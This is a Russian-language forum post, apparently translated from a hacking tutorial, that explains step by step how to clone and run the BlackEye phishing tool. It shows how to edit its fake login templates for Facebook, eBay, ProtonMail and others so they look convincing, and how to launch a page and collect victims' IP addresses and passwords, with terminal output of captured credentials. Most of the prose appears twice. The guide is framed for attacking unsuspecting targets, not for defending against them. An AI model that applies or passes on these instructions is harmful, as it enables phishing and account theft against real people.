Учетные записи в социальных сетях - излюбленная цель хакеров, и наиболее эффективная тактика атаки на учетные записи на таких ресурсах, как Facebook , Instagram и Twitter , часто основана на фишинге. Эти атаки с кражей паролей основаны на обмане пользователей, заставляющих их вводить свои пароли на убедительной поддельной веб-странице, и их становится все проще осуществить благодаря таким инструментам, как BlackEye.
BlackEye - это инструмент для быстрого создания фишинговых страниц, нацеленных на веб-сайты социальных сетей, что значительно упрощает возможность фишинга в той же сети. После перенаправления цели на фишинговую страницу можно легко перехватить пароли к учетным записям социальных сетей, полученные от ничего не подозревающих целей.
BlackEye для фишинга в социальных сетях
Пользователи очень доверяют своим аккаунтам в социальных сетях. Если у цели не включена двухфакторная аутентификация, легкость, с которой злоумышленник может получить к ней доступ, может быть удивительной. BlackEye - это доказательство концепции, показывающее, что эти фишинговые страницы не нужно усложнять или настраивать для эффективной работы.
BlackEye - это простой сценарий bash, который представляет несколько шаблонов на выбор, позволяя выбрать веб-сайт социальной сети для подражания. Оттуда он создает на вашем устройстве функциональный фишинговый сайт с возможностью перенаправления портов или других способов подключения к целевой машине.
Поддерживаемые сайты социальных сетей
BlackEye поддерживает 32 различных веб-сайта с фишинговыми шаблонами, но они различаются по качеству. Лучше всего протестировать их перед развертыванием, потому что некоторые из них имеют недостатки, которые могут выдать их, если пользователь обратит внимание. Хотя стандартные фишинговые страницы, предоставляемые BlackEye, довольно хороши, всегда полезно иметь возможность изменять их. Таким образом, вы можете удалить такие вещи, как уведомление об авторских правах, относящееся не к тому году.
Шаг 1Скачать и протестировать BlackEye
Во-первых, нам нужно клонировать исходный код из репозитория BlackEye GitHub . Для этого откройте новое окно терминала и введите следующие команды git и cd .
Примечание: в этом руководстве мы использовали оригинальный инструмент BlackEye, созданный thelinuxchoice , но с тех пор он был удален с GitHub. Вы можете использовать версию An0nUD4Y , которая основана на оригинале thelinuxchoice. Инструкции, приведенные ниже, были обновлены для использования этого инструмента.
Это должно установить репозиторий BlackEye и позволить ему запускать его из папки blackeye с помощью команды bash blackeye.sh . Когда мы запустим команду, мы должны увидеть экран-заставку ниже.
Шаг 2Настроить фишинговые сайты
Если нам не нравится что-то вроде уведомления об авторских правах с истекшим сроком действия, мы можем довольно легко это изменить. Сначала выйдите из сценария bash обратно в папку blackeye. Затем мы введем ls, чтобы увидеть папку сайтов в репозитории BlackEye.
Мы можем перейти к нему с помощью команды cd sites . Затем введите ls, чтобы просмотреть все шаблоны фишинговых сайтов, которые можно изменить.
Чтобы отредактировать Protonmail, мы можем ввести cd protonmail, а затем снова ls, чтобы увидеть файлы в этой папке. Вы должны увидеть что-то вроде файлов ниже.
Чтобы отредактировать HTML- код фишинг-страницы, вы можете сделать это напрямую, открыв login.html в текстовом редакторе, что позволит вам легко обновлять любые уведомления об авторских правах или другие сведения.
Шаг 3 Запустить фишинговую страницу
Чтобы запустить нашу фишинговую страницу, откройте окно терминала и снова перейдите в папку blackeye. Затем запустите команду bash blackeye.sh, чтобы вернуться в меню выбора фишинг-страницы. Здесь мы выберем eBay, номер 18.
После ввода номера сайта, который вы хотите создать, нажмите Enter . Затем нас попросят указать наш IP-адрес. Если вы нажмете Enter, не добавляя его, он попытается добавить ваш по умолчанию, но это не всегда срабатывает. После ввода вашего IP-адреса вы должны увидеть что-то вроде подсказки ниже.
Затем перейдите по фишинговой ссылке в браузере, чтобы увидеть результат фишингового сайта.
Шаг 4 Захват пароля
Когда вы открываете сайт в браузере, он должен выглядеть примерно так:
Открытие ссылки заставляет скрипт сообщать о типах устройств, которые в настоящее время обращаются к фишинговой странице.
Как только цель вводит свои учетные данные, она перенаправляется на реальную страницу eBay, создавая иллюзию успешного входа в систему.
https://img.wonderhowto.com/img/original/98/63/63693312357000/0/636933123570009863.jpg
Со стороны хакера BlackEye предоставляет нам учетные данные, которые только что ввела наша цель.
Именно так мы перехватили и сохранили учетные данные, которые цель ввела на нашу фишинговую страницу!
Видеоинструкция по установке и использованию BlackEye (YouTube) (кликабельно)
Спасибо за внимание )
BlackEye - это инструмент для быстрого создания фишинговых страниц, нацеленных на веб-сайты социальных сетей, что значительно упрощает возможность фишинга в той же сети. После перенаправления цели на фишинговую страницу можно легко перехватить пароли к учетным записям социальных сетей, полученные от ничего не подозревающих целей.
BlackEye для фишинга в социальных сетях
Пользователи очень доверяют своим аккаунтам в социальных сетях. Если у цели не включена двухфакторная аутентификация, легкость, с которой злоумышленник может получить к ней доступ, может быть удивительной. BlackEye - это доказательство концепции, показывающее, что эти фишинговые страницы не нужно усложнять или настраивать для эффективной работы.
BlackEye - это простой сценарий bash, который представляет несколько шаблонов на выбор, позволяя выбрать веб-сайт социальной сети для подражания. Оттуда он создает на вашем устройстве функциональный фишинговый сайт с возможностью перенаправления портов или других способов подключения к целевой машине.
Поддерживаемые сайты социальных сетей
BlackEye поддерживает 32 различных веб-сайта с фишинговыми шаблонами, но они различаются по качеству. Лучше всего протестировать их перед развертыванием, потому что некоторые из них имеют недостатки, которые могут выдать их, если пользователь обратит внимание. Хотя стандартные фишинговые страницы, предоставляемые BlackEye, довольно хороши, всегда полезно иметь возможность изменять их. Таким образом, вы можете удалить такие вещи, как уведомление об авторских правах, относящееся не к тому году.
Шаг 1Скачать и протестировать BlackEye
Во-первых, нам нужно клонировать исходный код из репозитория BlackEye GitHub . Для этого откройте новое окно терминала и введите следующие команды git и cd .
Примечание: в этом руководстве мы использовали оригинальный инструмент BlackEye, созданный thelinuxchoice , но с тех пор он был удален с GitHub. Вы можете использовать версию An0nUD4Y , которая основана на оригинале thelinuxchoice. Инструкции, приведенные ниже, были обновлены для использования этого инструмента.
Форматирование (BB-код):
~$ git clone https://github.com/An0nUD4Y/blackeye
Cloning into 'blackeye'...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$Это должно установить репозиторий BlackEye и позволить ему запускать его из папки blackeye с помощью команды bash blackeye.sh . Когда мы запустим команду, мы должны увидеть экран-заставку ниже.
Форматирование (BB-код):
~/blackeye$ bash blackeye.sh
:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by BlackEye. ::
:: Only use for educational purporses!! ::
:: Attacking targets without mutual consent is illegal! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjokaШаг 2Настроить фишинговые сайты
Если нам не нравится что-то вроде уведомления об авторских правах с истекшим сроком действия, мы можем довольно легко это изменить. Сначала выйдите из сценария bash обратно в папку blackeye. Затем мы введем ls, чтобы увидеть папку сайтов в репозитории BlackEye.
Форматирование (BB-код):
~/blackeye$ ls
blackeye.sh LICENSE README.md sitesМы можем перейти к нему с помощью команды cd sites . Затем введите ls, чтобы просмотреть все шаблоны фишинговых сайтов, которые можно изменить.
Форматирование (BB-код):
~/blackeye$ cd sites
~/blackeye/sites$ ls
adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandexЧтобы отредактировать Protonmail, мы можем ввести cd protonmail, а затем снова ls, чтобы увидеть файлы в этой папке. Вы должны увидеть что-то вроде файлов ниже.
Форматирование (BB-код):
~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls
index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txtЧтобы отредактировать HTML- код фишинг-страницы, вы можете сделать это напрямую, открыв login.html в текстовом редакторе, что позволит вам легко обновлять любые уведомления об авторских правах или другие сведения.
Шаг 3 Запустить фишинговую страницу
Чтобы запустить нашу фишинговую страницу, откройте окно терминала и снова перейдите в папку blackeye. Затем запустите команду bash blackeye.sh, чтобы вернуться в меню выбора фишинг-страницы. Здесь мы выберем eBay, номер 18.
Форматирование (BB-код):
~/blackeye/sites/protonmail$ cd
~$ cd blackeye
~/blackeye$ bash blackeye.sh
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
[*] Choose an option: 18После ввода номера сайта, который вы хотите создать, нажмите Enter . Затем нас попросят указать наш IP-адрес. Если вы нажмете Enter, не добавляя его, он попытается добавить ваш по умолчанию, но это не всегда срабатывает. После ввода вашего IP-адреса вы должны увидеть что-то вроде подсказки ниже.
Форматирование (BB-код):
[*] Put your local IP (Default 10.0.6.27):
[*] Starting php server...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...Затем перейдите по фишинговой ссылке в браузере, чтобы увидеть результат фишингового сайта.
Шаг 4 Захват пароля
Когда вы открываете сайт в браузере, он должен выглядеть примерно так:
Открытие ссылки заставляет скрипт сообщать о типах устройств, которые в настоящее время обращаются к фишинговой странице.
Форматирование (BB-код):
[*] Waiting victim open the link ...
[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Saved: shopping/saved.ip.txtКак только цель вводит свои учетные данные, она перенаправляется на реальную страницу eBay, создавая иллюзию успешного входа в систему.
https://img.wonderhowto.com/img/original/98/63/63693312357000/0/636933123570009863.jpg
Со стороны хакера BlackEye предоставляет нам учетные данные, которые только что ввела наша цель.
Форматирование (BB-код):
[*] Waiting credentials ...
[*] Credentials Found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites/shopping/saved.usernames.txtИменно так мы перехватили и сохранили учетные данные, которые цель ввела на нашу фишинговую страницу!
Видеоинструкция по установке и использованию BlackEye (YouTube) (кликабельно)
Спасибо за внимание )